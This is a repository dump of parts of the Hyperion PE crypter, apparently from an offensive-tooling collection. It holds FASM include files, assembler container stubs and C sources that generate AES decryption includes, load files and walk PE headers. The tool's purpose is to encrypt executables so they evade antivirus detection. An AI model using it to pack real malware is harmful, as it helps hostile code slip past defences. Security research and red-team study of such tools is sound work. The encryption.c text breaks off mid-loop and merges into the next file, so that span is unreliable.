13 | name@proc equ . }
14 |
15 | struc endp
16 | { match =.,name@proc \{ endp \} }
17 |
18 | macro option setting
19 | { match =prologue:macro, setting \{ prologue@proc equ macro \}
20 | match =epilogue:macro, setting \{ epilogue@proc equ macro \} }
21 |
22 | macro none procname,flag,parmbytes,localbytes,reglist { }
23 |
24 | macro assume params
25 | {
26 | local expr
27 | define expr params
28 | match reg:struct, expr
29 | \{
30 | match assumed, reg\#@assumed \\{ irp name, assumed \\\{ restore name \\\} \\}
31 | macro label . \\{ local def
32 | define def .
33 | match =reg =at label, def \\\{ define def \\\}
34 | match name at,def \\\{ def@assumed reg,name,label at
35 | define def \\\}
36 | match name,def \\\{ def@assumed reg,.,: \\\} \\}
37 | struc db [val] \\{ \common def@assumed reg,., \\}
38 | struc dw [val] \\{ \common def@assumed reg,., \\}
39 | struc dp [val] \\{ \common def@assumed reg,., \\}
40 | struc dd [val] \\{ \common def@assumed reg,., \\}
41 | struc dt [val] \\{ \common def@assumed reg,., \\}
42 | struc dq [val] \\{ \common def@assumed reg,., \\}
43 | struc rb cnt \\{ def@assumed reg,.,rb cnt \\}
44 | struc rw cnt \\{ def@assumed reg,.,rw cnt \\}
45 | struc rp cnt \\{ def@assumed reg,.,rp cnt \\}
46 | struc rd cnt \\{ def@assumed reg,.,rd cnt \\}
47 | struc rt cnt \\{ def@assumed reg,.,rt cnt \\}
48 | struc rq cnt \\{ def@assumed reg,.,rq cnt \\}
49 | reg\#@assumed equ
50 | virtual at reg
51 | reg struct
52 | end virtual
53 | purge label
54 | restruc db,dw,dp,dd,dt,dq
55 | restruc rb,rw,rp,rd,rt,rq \} }
56 |
57 | macro def@assumed reg,name,def
58 | { match vars, reg#@assumed \{ reg#@assumed equ reg#@assumed, \}
59 | reg#@assumed equ reg#@assumed name
60 | local ..label
61 | name equ ..label
62 | ..label def }
63 |
64 | struc label type { label . type }
65 |
66 | struc none { label . }
67 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/COMCTL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMCTL32 API calls parameters' count
3 |
4 | CreateMappedBitmap% = 5
5 | CreatePropertySheetPage% = 1
6 | CreateStatusWindow% = 4
7 | CreateToolbar% = 8
8 | CreateToolbarEx% = 13
9 | CreateUpDownControl% = 12
10 | DestroyPropertySheetPage% = 1
11 | DrawInsert% = 3
12 | DrawStatusText% = 4
13 | FlatSB_EnableScrollBar% = 3
14 | FlatSB_GetScrollInfo% = 3
15 | FlatSB_GetScrollPos% = 2
16 | FlatSB_GetScrollProp% = 3
17 | FlatSB_GetScrollRange% = 4
18 | FlatSB_SetScrollInfo% = 4
19 | FlatSB_SetScrollPos% = 4
20 | FlatSB_SetScrollProp% = 4
21 | FlatSB_SetScrollRange% = 5
22 | FlatSB_ShowScrollBar% = 3
23 | GetEffectiveClientRect% = 3
24 | ImageList_Add% = 3
25 | ImageList_AddIcon% = 2
26 | ImageList_AddMasked% = 3
27 | ImageList_BeginDrag% = 4
28 | ImageList_Copy% = 5
29 | ImageList_Create% = 5
30 | ImageList_Destroy% = 1
31 | ImageList_DragEnter% = 3
32 | ImageList_DragLeave% = 1
33 | ImageList_DragMove% = 2
34 | ImageList_DragShowNolock% = 1
35 | ImageList_Draw% = 6
36 | ImageList_DrawEx% = 10
37 | ImageList_DrawIndirect% = 1
38 | ImageList_Duplicate% = 1
39 | ImageList_EndDrag% = 0
40 | ImageList_GetBkColor% = 1
41 | ImageList_GetDragImage% = 2
42 | ImageList_GetIcon% = 3
43 | ImageList_GetIconSize% = 3
44 | ImageList_GetImageCount% = 1
45 | ImageList_GetImageInfo% = 3
46 | ImageList_GetImageRect% = 3
47 | ImageList_LoadImage% = 7
48 | ImageList_Merge% = 6
49 | ImageList_Read% = 1
50 | ImageList_Remove% = 2
51 | ImageList_Replace% = 4
52 | ImageList_ReplaceIcon% = 3
53 | ImageList_SetBkColor% = 2
54 | ImageList_SetDragCursorImage% = 4
55 | ImageList_SetFilter% = 3
56 | ImageList_SetIconSize% = 3
57 | ImageList_SetImageCount% = 2
58 | ImageList_SetOverlayImage% = 3
59 | ImageList_Write% = 2
60 | InitCommonControls% = 0
61 | InitCommonControlsEx% = 1
62 | InitializeFlatSB% = 1
63 | LBItemFromPt% = 4
64 | MakeDragList% = 1
65 | MenuHelp% = 7
66 | PropertySheet% = 1
67 | ShowHideMenuCtl% = 3
68 | UninitializeFlatSB% = 1
69 | _TrackMouseEvent% = 1
70 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls parameters' count
3 |
4 | ChooseColor% = 1
5 | ChooseFont% = 1
6 | CommDlgExtendedError% = 0
7 | FindText% = 1
8 | FormatCharDlgProc% = 4
9 | GetFileTitle% = 3
10 | GetOpenFileName% = 1
11 | GetSaveFileName% = 1
12 | LoadAlterBitmap% = 3
13 | PageSetupDlg% = 1
14 | PrintDlg% = 1
15 | ReplaceText% = 1
16 | WantArrows% = 4
17 | dwLBSubclass% = 4
18 | dwOKSubclass% = 4
19 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/SHELL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; SHELL32 API calls parameters' count
3 |
4 | CheckEscapes% = 2
5 | DoEnvironmentSubst% = 2
6 | DragAcceptFiles% = 2
7 | DragFinish% = 1
8 | DragQueryFile% = 4
9 | DragQueryPoint% = 2
10 | DuplicateIcon% = 2
11 | ExtractAssociatedIcon% = 3
12 | ExtractAssociatedIconEx% = 4
13 | ExtractIcon% = 3
14 | ExtractIconEx% = 5
15 | ExtractIconResInfo% = 5
16 | FindExeDlgProc% = 4
17 | FindExecutable% = 3
18 | FreeIconList% = 2
19 | InternalExtractIconList% = 3
20 | RealShellExecute% = 10
21 | RealShellExecuteEx% = 11
22 | RegenerateUserEnvironment% = 2
23 | SHAddToRecentDocs% = 2
24 | SHAppBarMessage% = 2
25 | SHBrowseForFolder% = 1
26 | SHChangeNotify% = 4
27 | SHEmptyRecycleBin% = 3
28 | SHFileOperation% = 1
29 | SHFormatDrive% = 4
30 | SHFreeNameMappings% = 1
31 | SHGetDataFromIDList% = 5
32 | SHGetDesktopFolder% = 1
33 | SHGetDiskFreeSpace% = 4
34 | SHGetFileInfo% = 5
35 | SHGetInstanceExplorer% = 1
36 | SHGetMalloc% = 1
37 | SHGetNewLinkInfo% = 5
38 | SHGetPathFromIDList% = 2
39 | SHGetSettings% = 2
40 | SHGetSpecialFolderLocation% = 3
41 | SHGetSpecialFolderPath% = 4
42 | SHInvokePrinterCommand% = 5
43 | SHLoadInProc% = 1
44 | SHQueryRecycleBin% = 2
45 | SHUpdateRecycleBinIcon% = 0
46 | SheChangeDir% = 1
47 | SheChangeDirEx% = 1
48 | SheFullPath% = 3
49 | SheGetCurDrive% = 0
50 | SheGetDir% = 2
51 | SheRemoveQuotes% = 1
52 | SheSetCurDrive% = 1
53 | SheShortenPath% = 2
54 | ShellAbout% = 4
55 | ShellExecute% = 6
56 | ShellExecuteEx% = 1
57 | ShellHookProc% = 3
58 | Shell_NotifyIcon% = 2
59 | StrChr% = 2
60 | StrChrI% = 2
61 | StrCmpN% = 3
62 | StrCmpNI% = 3
63 | StrCpyN% = 3
64 | StrNCmp% = 3
65 | StrNCmpI% = 3
66 | StrNCpy% = 3
67 | StrRChr% = 3
68 | StrRChrI% = 3
69 | StrRStr% = 3
70 | StrRStrI% = 3
71 | StrStr% = 2
72 | StrStrI% = 2
73 | WOWShellExecute% = 7
74 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/WSOCK32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; WSOCK32 API calls parameters' count
3 |
4 | AcceptEx% = 8
5 | EnumProtocols% = 3
6 | GetAcceptExSockaddrs% = 8
7 | GetAddressByName% = 10
8 | GetNameByType% = 3
9 | GetService% = 7
10 | GetTypeByName% = 2
11 | MigrateWinsockConfiguration% = 3
12 | NPLoadNameSpaces% = 3
13 | SetService% = 6
14 | TransmitFile% = 7
15 | WEP% = 0
16 | WSAAsyncGetHostByAddr% = 7
17 | WSAAsyncGetHostByName% = 5
18 | WSAAsyncGetProtoByName% = 5
19 | WSAAsyncGetProtoByNumber% = 5
20 | WSAAsyncGetServByName% = 6
21 | WSAAsyncGetServByPort% = 6
22 | WSACancelAsyncRequest% = 4
23 | WSACancelBlockingCall% = 0
24 | WSACleanup% = 0
25 | WSAGetLastError% = 0
26 | WSAIsBlocking% = 0
27 | WSARecvEx% = 4
28 | WSASetBlockingHook% = 1
29 | WSASetLastError% = 1
30 | WSAStartup% = 2
31 | WSAUnhookBlockingHook% = 0
32 | __WSAFDIsSet% = 2
33 | accept% = 3
34 | bind% = 3
35 | closesocket% = 1
36 | connect% = 3
37 | dn_expand% = 5
38 | gethostbyaddr% = 3
39 | gethostbyname% = 1
40 | gethostname% = 2
41 | getnetbyname% = 1
42 | getpeername% = 3
43 | getprotobyname% = 1
44 | getprotobynumber% = 1
45 | getservbyname% = 2
46 | getservbyport% = 2
47 | getsockname% = 3
48 | getsockopt% = 5
49 | htonl% = 1
50 | htons% = 1
51 | inet_addr% = 1
52 | inet_network% = 1
53 | inet_ntoa% = 1
54 | ioctlsocket% = 3
55 | listen% = 2
56 | ntohl% = 1
57 | ntohs% = 1
58 | rcmd% = 6
59 | recv% = 4
60 | recvfrom% = 6
61 | rexec% = 6
62 | rresvport% = 1
63 | s_perror% = 2
64 | select% = 5
65 | send% = 4
66 | sendto% = 6
67 | sethostname% = 2
68 | setsockopt% = 5
69 | shutdown% = 2
70 | socket% = 3
71 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN32A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \}
12 | match , val \{ . db ? \} }
13 | sizeof.TCHAR = 1
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#A
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN32W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . du val \}
12 | match , val \{ . du ? \} }
13 | sizeof.TCHAR = 2
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#W
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN64A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \}
12 | match , val \{ . db ? \} }
13 | sizeof.TCHAR = 1
14 |
15 | include 'equates/kernel64.inc'
16 | include 'equates/user64.inc'
17 | include 'equates/gdi64.inc'
18 | include 'equates/comctl64.inc'
19 | include 'equates/comdlg64.inc'
20 | include 'equates/shell64.inc'
21 |
22 | macro api [name] { if used name
23 | label name qword at name#A
24 | end if }
25 |
26 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN64W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . du val \}
12 | match , val \{ . du ? \} }
13 | sizeof.TCHAR = 2
14 |
15 | include 'equates/kernel64.inc'
16 | include 'equates/user64.inc'
17 | include 'equates/gdi64.inc'
18 | include 'equates/comctl64.inc'
19 | include 'equates/comdlg64.inc'
20 | include 'equates/shell64.inc'
21 |
22 | macro api [name] { if used name
23 | label name qword at name#W
24 | end if }
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/fasm.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Fasm/fasm.exe
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/license.TXT:
--------------------------------------------------------------------------------
1 |
2 | flat assembler version 1.71
3 | Copyright (c) 1999-2016, Tomasz Grysztar.
4 | All rights reserved.
5 |
6 | This program is free for commercial and non-commercial use as long as
7 | the following conditions are adhered to.
8 |
9 | Copyright remains Tomasz Grysztar, and as such any Copyright notices
10 | in the code are not to be removed.
11 |
12 | Redistribution and use in source and binary forms, with or without
13 | modification, are permitted provided that the following conditions are
14 | met:
15 |
16 | 1. Redistributions of source code must retain the above copyright notice,
17 | this list of conditions and the following disclaimer.
18 | 2. Redistributions in binary form must reproduce the above copyright
19 | notice, this list of conditions and the following disclaimer in the
20 | documentation and/or other materials provided with the distribution.
21 |
22 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
23 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
24 | TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
25 | PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
26 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
27 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
28 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
29 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
30 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
31 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
32 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
33 |
34 | The licence and distribution terms for any publically available
35 | version or derivative of this code cannot be changed. i.e. this code
36 | cannot simply be copied and put under another distribution licence
37 | (including the GNU Public Licence).
38 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/32/hyperion.inc:
--------------------------------------------------------------------------------
1 | CreateFileMapping equ 0
2 | MapViewOfFile equ CreateFileMapping + 4
3 | UnmapViewOfFile equ MapViewOfFile + 4
4 | CreateFile equ UnmapViewOfFile + 4
5 | CloseHandle equ CreateFile + 4
6 | GetFileSize equ CloseHandle + 4
7 | DeleteFile equ GetFileSize + 4
8 | GetModuleHandle equ DeleteFile + 4
9 | VirtualAlloc equ GetModuleHandle + 4
10 | VirtualProtect equ VirtualAlloc + 4
11 | VirtualFree equ VirtualProtect + 4
12 |
13 | SIZE_DATA_SECTION_NAME equ 5
14 | SIZE_CHECKSUM equ 4
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/32/logfile_disable.asm:
--------------------------------------------------------------------------------
1 | ;writes a string and a newline to the logfile
2 | macro writeWithNewLine char_sequence, char_buffer, error_exit{
3 | char_sequence char_buffer
4 | mov eax,1
5 | }
6 |
7 | ;write a string to the logfile
8 | macro writeLog apitable, content{
9 | mov eax,1
10 | }
11 |
12 | ;delete old log file and create a new one
13 | macro initLogFile apitable{
14 | mov eax,1
15 | }
16 |
17 | ;write a newline into logfile
18 | macro writeNewLineToLog apitable{
19 | mov eax,1
20 | }
21 |
22 | ;write a register value into logile
23 | macro writeRegisterToLog apitable, value{
24 | mov eax,1
25 | }
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/decryption_payload.asm:
--------------------------------------------------------------------------------
1 | include '..\..\Payloads\Aes\64\aes.inc'
2 | include '..\..\Payloads\Aes\64\aes.asm'
3 | include '..\..\Payloads\Aes\64\decryptexecutable.asm'
4 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/image_base.inc:
--------------------------------------------------------------------------------
1 | IMAGE_BASE equ 0x400000
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/image_size.inc:
--------------------------------------------------------------------------------
1 | IMAGE_SIZE equ 0x52000
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/infile_size.inc:
--------------------------------------------------------------------------------
1 | INFILE_SIZE equ 0x28e10
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/key_size.inc:
--------------------------------------------------------------------------------
1 | REAL_KEY_SIZE equ 0x6
2 | REAL_KEY_RANGE equ 0x4
3 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/logfile_disable.asm:
--------------------------------------------------------------------------------
1 | macro createStringBruteforcing location
2 | {
3 |
4 | }
5 |
6 | macro createStringSettingPermissions location
7 | {
8 |
9 | }
10 |
11 | macro createStringOrdinal location
12 | {
13 |
14 | }
15 |
16 | macro createStringName location
17 | {
18 |
19 | }
20 |
21 | macro createStringProcessImportDirectory location
22 | {
23 |
24 | }
25 |
26 | macro createStringFoundImportTable location
27 | {
28 |
29 | }
30 |
31 | macro createStringLoadingFilesAPIs location
32 | {
33 |
34 | }
35 |
36 | macro createStringMappingFileInMemory location
37 | {
38 |
39 | }
40 |
41 | macro createStringLoaded location
42 | {
43 |
44 | }
45 |
46 | macro createStringLoadedPEHeader location
47 | {
48 |
49 | }
50 |
51 | macro createStringVerifyPE location
52 | {
53 |
54 | }
55 |
56 | macro createStringVerifyChecksum location
57 | {
58 |
59 | }
60 |
61 | macro createStringDone location
62 | {
63 |
64 | }
65 |
66 | macro createStringError location
67 | {
68 |
69 | }
70 |
71 | macro createStringStartingHyperion location
72 | {
73 |
74 | }
75 |
76 | macro createStringStartingHyperionLines location
77 | {
78 |
79 | }
80 |
81 | macro createStringLogTxt location
82 | {
83 |
84 | }
85 |
86 | ;writes a string and a newline to the logfile
87 | macro writeWithNewLine char_sequence, char_buffer, error_exit{
88 | char_sequence char_buffer
89 |
90 | }
91 |
92 | ;write a string to the logfile
93 | macro writeLog content, exit_error{
94 |
95 | }
96 |
97 | ;delete old log file and create a new one
98 | macro initLogFile exit_error{
99 |
100 | }
101 |
102 | ;write a newline into logfile
103 | macro writeNewLineToLog exit_error{
104 |
105 | }
106 |
107 | ;write a register value into logile
108 | macro writeRegisterToLog value, exit_error{
109 |
110 | }
111 |
112 | macro writeSectionNameAndAddressToLog{
113 |
114 | }
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/logfile_select.asm:
--------------------------------------------------------------------------------
1 | include 'logfile_disable.asm'
2 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/64/main_prolog.inc:
--------------------------------------------------------------------------------
1 | format PE64 GUI 5.0 at IMAGE_BASE
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/aes.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 | #include "fasmoutput.h"
3 |
4 | //include '..\..\Payloads\Aes\32\aes.inc'
5 | //include '..\..\Payloads\Aes\32\aes.asm'
6 | //include '..\..\Payloads\Aes\32\decryptexecutable.asm'
7 |
8 | BOOL decryptAES(BOOL pe32){
9 | const char* payload_directory;
10 | const char* container_directory;
11 |
12 | //select destination paths
13 | if(pe32){
14 | payload_directory = PAYLOAD32_AES_DIR;
15 | container_directory = CONTAINER32_DIR;
16 | }
17 | else{
18 | payload_directory = PAYLOAD64_AES_DIR;
19 | container_directory = CONTAINER64_DIR;
20 | }
21 |
22 | //create file names
23 | char aes_inc[MAX_CHAR_SIZE];
24 | aes_inc[0] = 0;
25 | strlcat(aes_inc, payload_directory, MAX_CHAR_SIZE);
26 | strlcat(aes_inc, AES_INC_FILENAME, MAX_CHAR_SIZE);
27 |
28 | char aes_asm[MAX_CHAR_SIZE];
29 | aes_asm[0] = 0;
30 | strlcat(aes_asm, payload_directory, MAX_CHAR_SIZE);
31 | strlcat(aes_asm, AES_ASM_FILENAME, MAX_CHAR_SIZE);
32 |
33 | char decrypter_asm[MAX_CHAR_SIZE];
34 | decrypter_asm[0] = 0;
35 | strlcat(decrypter_asm, payload_directory, MAX_CHAR_SIZE);
36 | strlcat(decrypter_asm, AES_DECRYPTION_FILENAME, MAX_CHAR_SIZE);
37 |
38 | //create include file to use aes algorithm
39 | if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_inc, FALSE))
40 | {
41 | return FALSE;
42 | }
43 | if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_asm, TRUE))
44 | {
45 | return FALSE;
46 | }
47 | if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, decrypter_asm, TRUE))
48 | {
49 | return FALSE;
50 | }
51 |
52 | return TRUE;
53 | }
54 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/aes.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/aes.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/encryption.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 |
3 | #define CBC 0
4 | #define CTR 0
5 | #define ECB 1
6 | #include
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /**
13 | * Create a simple checksum from a file which adds each of its bytes
14 | */
15 | uint32_t getChecksum(unsigned char* data, unsigned int size){
16 | uint32_t ret = 0;
17 | for(unsigned int i=0; i
4 | #include
5 |
6 | BOOL fileToMem(const char* file_name, struct OpenFile* open_file){
7 | //open input file
8 | verbose("Opening %s\n", file_name);
9 |
10 | FILE* f1 = fopen(file_name,"rb");
11 | if(f1 == NULL) {
12 | fprintf(stderr, "Could not open %s\n", file_name);
13 | return FALSE;
14 | }
15 |
16 | /* obtain file size: */
17 | fseek (f1, 0, SEEK_END);
18 | int f1_size = ftell (f1);
19 | rewind (f1);
20 |
21 | /* copy file to memory */
22 | unsigned char* file1 = (unsigned char*) malloc(f1_size);
23 | if(file1 == NULL) {
24 | fprintf(stderr, "Could not allocate memory for input file size %d\n", f1_size);
25 | return FALSE;
26 | }
27 | size_t read_bytes = fread((void*) file1, 1, f1_size, f1);
28 | if(read_bytes != f1_size) {
29 | fprintf(stderr, "Could not copy input file into memory: %d %d\n",
30 | read_bytes, f1_size);
31 | fclose(f1);
32 | return FALSE;
33 | }
34 |
35 | /* close input files */
36 | fclose(f1);
37 |
38 | //file opened successfully
39 | open_file->file = file1;
40 | open_file->size = f1_size;
41 | verbose("Successfully copied file to memory location: 0x%x\n",
42 | (unsigned long int) open_file->file);
43 | return TRUE;
44 | }
45 |
46 | BOOL memToFile(const char* file_name, char* content, unsigned long size,
47 | BOOL append){
48 | FILE* f1 = NULL;
49 | if(!append) {
50 | f1 = fopen(file_name,"wb");
51 | }
52 | else{
53 | f1 = fopen(file_name,"ab");
54 | }
55 |
56 | if(f1 == NULL) {
57 | fprintf(stderr, "Could not open %s\n", file_name);
58 | return FALSE;
59 | }
60 |
61 | size_t bytes_written = fwrite(content, sizeof(char), size, f1);
62 | if(bytes_written != size) {
63 | fclose(f1);
64 | fprintf(stderr, "Could not copy memory to output file: %d %d\n",
65 | bytes_written, size);
66 | return FALSE;
67 | }
68 |
69 | /* close input files */
70 | fclose(f1);
71 | return TRUE;
72 | }
73 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/fileaccess.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/fileaccess.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/hyperion.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/hyperion.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe32.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 |
3 | /**
4 | * Jumps from the CoffHeader to the OptionalStandardHeader
5 | */
6 | struct OptionalStandardHeader32* getOSH32(struct CoffHeader* coff_ptr){
7 | struct OptionalStandardHeader32* ret =
8 | (struct OptionalStandardHeader32*)
9 | ((char*) coff_ptr + sizeof(struct CoffHeader));
10 | return ret;
11 | }
12 |
13 | /**
14 | * Jumps from the OptionalStandardHeader to the OptionalWindowsHeader
15 | */
16 | struct OptionalWindowsHeader32* getOWH32(struct OptionalStandardHeader32* os_ptr){
17 | return (struct OptionalWindowsHeader32*)
18 | (((char*) os_ptr) + sizeof(struct OptionalStandardHeader32));
19 | }
20 |
21 | /*
22 | * Retrives the DataDirectory List
23 | */
24 | struct ImageDataDirectory* getIDD32(struct OptionalWindowsHeader32* owh_ptr){
25 | struct ImageDataDirectory* ret =
26 | (struct ImageDataDirectory*)
27 | (((char*) owh_ptr) + sizeof(struct OptionalWindowsHeader32));
28 | return ret;
29 | }
30 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe32.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/pe32.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe64.c:
--------------------------------------------------------------------------------
1 | #include "hyperion.h"
2 |
3 | /**
4 | * Jumps from the CoffHeader to the OptionalStandardHeader
5 | */
6 | struct OptionalStandardHeader64* getOSH64(struct CoffHeader* coff_ptr){
7 | struct OptionalStandardHeader64* ret
8 | = (struct OptionalStandardHeader64*)
9 | ((char*) coff_ptr + sizeof(struct CoffHeader));
10 | return ret;
11 | }
12 |
13 | /**
14 | * Jumps from the OptionalStandardHeader to the OptionalWindowsHeader
15 | */
16 | struct OptionalWindowsHeader64* getOWH64(struct OptionalStandardHeader64* os_ptr){
17 | return (struct OptionalWindowsHeader64*)
18 | (((char*) os_ptr) + sizeof(struct OptionalStandardHeader64));
19 | }
20 |
21 | /*
22 | * Retrives the DataDirectory List
23 | */
24 | struct ImageDataDirectory* getIDD64(struct OptionalWindowsHeader64* owh_ptr){
25 | struct ImageDataDirectory* ret =
26 | (struct ImageDataDirectory*)
27 | (((char*) owh_ptr) + sizeof(struct OptionalWindowsHeader64));
28 | return ret;
29 | }
30 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/pe64.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/pe_general.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/pe_general.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/secure_string.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Code from http://stackoverflow.com/users/2193455/kangear
3 | */
4 | #ifndef HAVE_STRLCAT
5 |
6 | #include
7 | #include
8 | #include
9 |
10 | /*
11 | * '_cups_strlcat()' - Safely concatenate two strings.
12 | */
13 |
14 | size_t /* O - Length of string */
15 | strlcat(char *dst, /* O - Destination string */
16 | const char *src, /* I - Source string */
17 | size_t size) /* I - Size of destination string buffer */
18 | {
19 | size_t srclen; /* Length of source string */
20 | size_t dstlen; /* Length of destination string */
21 |
22 |
23 | /*
24 | * Figure out how much room is left...
25 | */
26 |
27 | dstlen = strlen(dst);
28 | size -= dstlen + 1;
29 |
30 | if (!size)
31 | return (dstlen); /* No room, return immediately... */
32 |
33 | /*
34 | * Figure out how much room is needed...
35 | */
36 |
37 | srclen = strlen(src);
38 |
39 | /*
40 | * Copy the appropriate amount...
41 | */
42 |
43 | if (srclen > size)
44 | srclen = size;
45 |
46 | memcpy(dst + dstlen, src, srclen);
47 | dst[dstlen + srclen] = '\0';
48 |
49 | return (dstlen + srclen);
50 | }
51 | #endif /* !HAVE_STRLCAT */
52 |
53 | #ifndef HAVE_STRLCPY
54 | /*
55 | * '_cups_strlcpy()' - Safely copy two strings.
56 | */
57 |
58 | size_t /* O - Length of string */
59 | strlcpy(char *dst, /* O - Destination string */
60 | const char *src, /* I - Source string */
61 | size_t size) /* I - Size of destination string buffer */
62 | {
63 | size_t srclen; /* Length of source string */
64 |
65 |
66 | /*
